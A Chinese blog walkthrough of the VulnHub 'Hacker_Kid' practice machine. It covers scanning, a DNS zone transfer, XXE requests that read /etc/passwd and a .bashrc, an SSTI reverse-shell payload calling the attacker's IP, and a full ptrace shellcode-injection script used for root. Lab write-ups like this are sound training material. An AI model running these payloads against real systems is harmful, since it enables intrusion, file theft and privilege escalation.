VnlnHub Hacker_Kid-v1.0.1

已于 2024-01-09 16:28:30 修改
阅读量121 收藏
点赞数
分类专栏: 靶机实操 文章标签: 网络安全 安全 web安全
于 2023-09-10 17:14:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76786857/article/details/132007412
版权

靶场下载地址:https://download.vulnhub.com/hackerkid/Hacker_Kid-v1.0.1.ova

0.靶机配置

攻击机kali:192.168.5.57

靶机ubuntu:192.168.5.72

将下载下来的靶机文件Hacker_Kid-v1.0.1.ova导入到vm中

开启靶机

1.信息收集

主机发现

arp-scan -l

发现靶机ip为192.168.5.72

2.端口扫描

nmap -p 1-65535 -A 192.168.5.72

发现开放了53端口,存在DNS服务

开放了80端口,存在HTTP服务,且中间件为Apache 2.4.41

开放了9999端口,存在HTTP服务,且中间件为Tornado 6.1

通常情况下DNS是TCP53端口是用于同一个域两台域名服务器之间做数据交换

而日常上网查询DNS解析是通过UDP53端口

我们只扫描TCP的端口,尝试扫描UDP53端口,发现确实是UDP53端口是开放的

3.WEB信息收集

访问目标的9999端口

http://192.168.5.72:9999

对该网址进行访问

http://192.168.5.72/

提示要使用dig命令发现一些线索

访问http://192.168.5.72/app.html   

但是没有有用信息

各个标签点击后并无响应请求,右键查看源代码看到有注释的信息。

4.参数爆破


view-source:http://192.168.5.72/

访问改页面源代码

之后挨个查看源码,看信息,发下了一个注释:使用参数page_no,这里参数很像一个页面的页码,我们尝试在后面加上page_no这个参数,发现出现了一段提示说我们的方法是对的,我们用BP爆破出他的数值到底是多少。。burp选择Numbers模块就行。值是21.

修改参数发包,然后使用bp中的intruder模块进行爆破

因为是页号,所以这里肯定是数字,所以payload我们指定未1-1000的所有整数

发现参数为21时页面与其他不同

访问查看

页面下面多了一行红色小字,提示有子域名存在后门漏洞,例如 hackers.blackhat.local 。那就先添加下本地域名解析。

编辑/etc/hosts文件


vi /etc/hosts
#添加内容如下
192.168.5.72 blackhat.local
192.168.5.72 hackers.blackhat.local

5.DNS区域传输

访问 一下hackers.blackhat.local

页面空白

访问另外一个也是空白页面

这就让我们感到奇怪。同时也让我们猜测是否这个域名是否有其他的主机名?再结合我们开头的 dig提示。我们就使用dig命令来进行探测。然后将我们探测到的域写入到hosts文件中依次的访问。

dig axfr @192.168.5.72 blackhat.local

依次访问这些页面发现了不一样的界面

查看一下9999端口,发现一个登录界面

于是在hackerkid.blackhat.local页面进行抓包测试

发现我们输入的这些信息都是通过XML数据来发送,所以我们就猜测这里可能存在XXE漏洞,进行漏洞探测

修改请求包 ,加入  xxe 攻击代码

POST /process.php HTTP/1.1

Host: hackerkid.blackhat.local

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: text/plain;charset=UTF-8

Content-Length: 248

Origin: http://hackerkid.blackhat.local

Connection: close

Referer: http://hackerkid.blackhat.local/



<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<root>

  <name>

    123

  </name>

  <tel>

    123

  </tel>

  <email>

    &xxe;

  </email>

  <password>

    123

  </password>

</root>

成功得到saket账号

使用 php封装器 base64编码,读取/home/saket/.bashrc文件

POST /process.php HTTP/1.1

Host: hackerkid.blackhat.local

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: text/plain;charset=UTF-8

Content-Length: 239

Origin: http://hackerkid.blackhat.local

Connection: close

Referer: http://hackerkid.blackhat.local/



<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/home/saket/.bashrc" >]>

<root><name>123</name><tel>123</tel>

<email>

&xxe;

</email><password>123</password></root>

得到base64编码文件解码

得到账号密码    

admin  Saket!#$%@!!

6.SSTI模板注入

尝试使用admin Saket!#$%@!!登录,发现失败

于是使用saket用户进行登录,发现登陆成功

存在name参数

尝试模板注入,发现确实存在模板注入(ssti漏洞)   ,表达式计算成功

在构造其他payload:

name={% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.5.72/4444 0>&1"')}}

发现报错,需要进行ascii编码赋值

{%25%20import%20os%20%25}{{os.system(%27bash%20-c%20%22bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.5.57%2f4444%200%3E%261%22%27)}}

访问这个payload,同时kali进行监听4444端口

nc -lvnp 4444

将下面这段编码后命令带入表达式(特殊符号要经过编码才能执行成功)

192.168.5.72:9999/?name={%25%20import%20os%20%25}{{os.system(%27bash%20-c%20%22bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.5.57%2f4444%200%3E%261%22%27)}}

成功获得shell

7.Capabilitie提权

python3 -c 'import pty;pty.spawn("/bin/bash")'   //升级终端

/sbin/getcap -r / 2>/dev/null #递归查询

我们发现 python2.7是有个 cap_sys_ptrace这个权限(可以调试程序权限),而这个权限是有提权的可能的一个权限。

所以我们就直接来看系统已经运行的有 root权限的程序有哪些。然后通过python2.7来进行利用漏洞来提取

ps -aef | grep root

随便选一个以root账号运行的进程,我们选用pid为737的这个进程

提权代码,将代码在kali保存到文件中

# inject.py# The C program provided at the GitHub Link given below can be used as a reference for writing the python script.
# GitHub Link: https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c 

import ctypes
import sys
import struct

# Macros defined in <sys/ptrace.h>
# https://code.woboq.org/qt5/include/sys/ptrace.h.html

PTRACE_POKETEXT   = 4
PTRACE_GETREGS    = 12
PTRACE_SETREGS    = 13
PTRACE_ATTACH     = 16
PTRACE_DETACH     = 17

# Structure defined in <sys/user.h>
# https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct

class user_regs_struct(ctypes.Structure):
    _fields_ = [
        ("r15", ctypes.c_ulonglong),
        ("r14", ctypes.c_ulonglong),
        ("r13", ctypes.c_ulonglong),
        ("r12", ctypes.c_ulonglong),
        ("rbp", ctypes.c_ulonglong),
        ("rbx", ctypes.c_ulonglong),
        ("r11", ctypes.c_ulonglong),
        ("r10", ctypes.c_ulonglong),
        ("r9", ctypes.c_ulonglong),
        ("r8", ctypes.c_ulonglong),
        ("rax", ctypes.c_ulonglong),
        ("rcx", ctypes.c_ulonglong),
        ("rdx", ctypes.c_ulonglong),
        ("rsi", ctypes.c_ulonglong),
        ("rdi", ctypes.c_ulonglong),
        ("orig_rax", ctypes.c_ulonglong),
        ("rip", ctypes.c_ulonglong),
        ("cs", ctypes.c_ulonglong),
        ("eflags", ctypes.c_ulonglong),
        ("rsp", ctypes.c_ulonglong),
        ("ss", ctypes.c_ulonglong),
        ("fs_base", ctypes.c_ulonglong),
        ("gs_base", ctypes.c_ulonglong),
        ("ds", ctypes.c_ulonglong),
        ("es", ctypes.c_ulonglong),
        ("fs", ctypes.c_ulonglong),
        ("gs", ctypes.c_ulonglong),
    ]

libc = ctypes.CDLL("libc.so.6")

pid=int(sys.argv[1])

# Define argument type and respone type.
libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]
libc.ptrace.restype = ctypes.c_uint64

# Attach to the process
libc.ptrace(PTRACE_ATTACH, pid, None, None)
registers=user_regs_struct()

# Retrieve the value stored in registers
libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))

print("Instruction Pointer: " + hex(registers.rip))

print("Injecting Shellcode at: " + hex(registers.rip))

# Shell code copied from exploit db.
shellcode="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"

# Inject the shellcode into the running process byte by byte.
for i in xrange(0,len(shellcode),4):
 
  # Convert the byte to little endian.
  shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16)
  shellcode_byte_little_endian=struct.pack("<I", shellcode_byte_int).rstrip('\x00').encode('hex')
  shellcode_byte=int(shellcode_byte_little_endian,16)
 
  # Inject the byte.
  libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),shellcode_byte)

print("Shellcode Injected!!")

# Modify the instuction pointer
registers.rip=registers.rip+2

# Set the registers
libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))

print("Final Instruction Pointer: " + hex(registers.rip))

# Detach from the process.
libc.ptrace(PTRACE_DETACH, pid, None, None)

上传到靶机

python2.7 inject.py 737

注入这个进程(如果连接不成功可以换用其他的进程注入)

注入成功后,会默认开启5600端口

netstat -ano | grep 5600

然后我们在kali上连接这个5600端口,成功获得root权限shell

nc 192.168.5.72 5600
id

廾匸0705
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
hacker_rank-java
03-30
hacker_rank-java
VnlnHub DC-6
weixin_45682839的博客
04-23 2913
VnlnHub DC-6通关攻略记录
VnlnHub DC-3.2
weixin_45682839的博客
04-16 887
VnlnHub DC-3.2 攻关记录攻略,得到一个flag和root权限
VnlnHub Vikings
weixin_45682839的博客
09-13 843
涉及知识包括:端口服务探测、敏感目录文件搜集、base64编码、WEB信息收集、文件还原、压缩包密码爆破、图片隐写和提取、素数、考拉兹猜想、python代码编写、rpyc服务提权
VnlnHub DC-4
weixin_45682839的博客
04-16 1423
靶场搭建 靶场下载地址:DC: 4 ~ VulnHub 下载镜像(Mirror版本) 下载下来的文件为 .OVA压缩文件,直接导入vmvare指定解压位置即可 网卡设置和攻击机KALI保持一致即可,这里我选择NAT模式 开机,靶场搭建完毕 渗透测试 首先明确目标,只有一个flag,有很多种进入的方法,没有提示 由于不知道靶机IP地址,所以使用nmap扫描整个网段 nmap -sP -T4 192.168.48.0/24 发现136和140两台主机(1,2,25
VnlnHub admx
weixin_45682839的博客
09-02 338
VnlnHub admx靶场通关记录攻略,涉及知识包括:端口服务探测、铭感目录扫描、burp页面内容批量替换、后台密码爆破、wordpress后台getshell、nc串联,python反弹shell、升级反弹的不完整shell、linux本地提权
Python库 | hacker_news-1.1.1.tar.gz
05-16
资源分类:Python库 所属语言:Python 资源全名:hacker_news-1.1.1.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
leetcode和oj-Leet_Code-Hacker_Rank:Leet_Code-Hacker_Rank
06-30
leetcode 和 oj Leet-Code OJ 以下是我在 2016 年夏季在 Hacker Rank 上做的一些练习项目,主要是 LeetCode。
AlgorithmsX-v1.0.1:LeetCode HackerRank算法
05-09
算法X-v1.0.1- 算法/ LeetCode / HackerRank
HackerRank_2019-2018_Developer-Skills-Report.pdf
06-23
HackerRank 2019-2018技能报告,报告中阐明 React, IOT和DeepLearning可能是互联网行业未来数年的最重要的发展方向.
VnlnHub DC-2
weixin_45682839的博客
04-14 230
VulnHub DC-2靶机攻关记录攻略,获得5个flag,获得root权限
VnlnHub BOREDHACKERBLOG CLOUD AV
weixin_45682839的博客
09-02 404
VnlnHub BOREDHACKERBLOG CLOUD AV靶机通关攻略记录,涉及知识包括:端口服务探测、sql注入、命令注入、nc串联、python反弹shell、密码爆破、linux本地提权等
VnlnHub-GoldenEye-v1
Bnessy
12-27 1977
导入靶机后,使用netdiscover获取靶机IP。 Netdiscover选项 这里使用命令:netdiscover -r 192.168.2.0/24,扫描到靶机IP为192.168.2.5 先使用nmap做信息收集:nmap -sS -sV -T5 -A -p- 192.168.2.5 -P0:值进行扫描,不[ping](http://man.linuxde.net/ping)主机; -PT:是同TCP的ping; -sV:探测服务版本信息; -sP:ping扫描,仅发现目标主
VnlnHub CHRONOS 1
weixin_45682839的博客
09-03 522
VnlnHub CHRONOS 1靶场通关攻略记录,涉及知识包括:端口服务探测、解编码、命令注入、nc串联、linux本地提权、框架漏洞利用
VulnHub靶场LupinOne
I夜白
02-01 4968
VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 直接解压用虚拟机打开就行,不用自己配置,没有账号密码,需要自己一步步来,对了,这是自动获取IP的,不需要自己配置. 一.信息收集 信息收集是很重要的,举个栗子来说,比如约出自己的女神出来玩,肯定向了解女神的经济情况还有喜好嘛,通过她的微信朋友圈,她身边的好友,淘宝等等,了解一个人,就要从最贴近生活的方向开始,就像"只有千日做贼,那有千日防贼",感觉有点不太贴切,意思是差不多的,用这个只是想表达信息收集的重
带妹玩转Vulnhub【一】
BadRer的博客
09-27 7362
前言 题目是不想在刷了,想学一学渗透测试的知识。 由于是开头之作,所以会写的比较的详细,尽量让大家少走弯路。 带妹是不可能带妹的,这辈子都不可能带妹的
VulnHub靶场系列:Flick
快吃小蛋糕吧的博客
10-03 1189
VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来。 环境部署: 下载靶场并导入到VMware中: https://download.vulnhub.com/flick/flick.tar.gz 实战: 首先使用工具扫描整个网段得到靶机IP: fping -g 192.168.142.0/24 得到靶机IP后使用Nmap工具检测服务器开放端口: nmap -sV -p1-65535 192.168.142.35
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8230
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
RSAC 2024观察:软件供应链安全进入AI+时代
最新发布
lurenjia404的博客
05-15 916
盘点RSAC会议上软件供应链安全议题的特点、趋势及启示。
resource hacker v5.1.8 build 360
04-30
Resource Hacker v5.1.8 Build 360是最新版本,它包含了一些重要的新功能和改进,例如在Windows 10环境下的完整兼容性、添加了一个“字符串表排序”功能,这使得编辑字符串表更为方便,同时还改进了其它一些编辑...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

廾匸0705

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值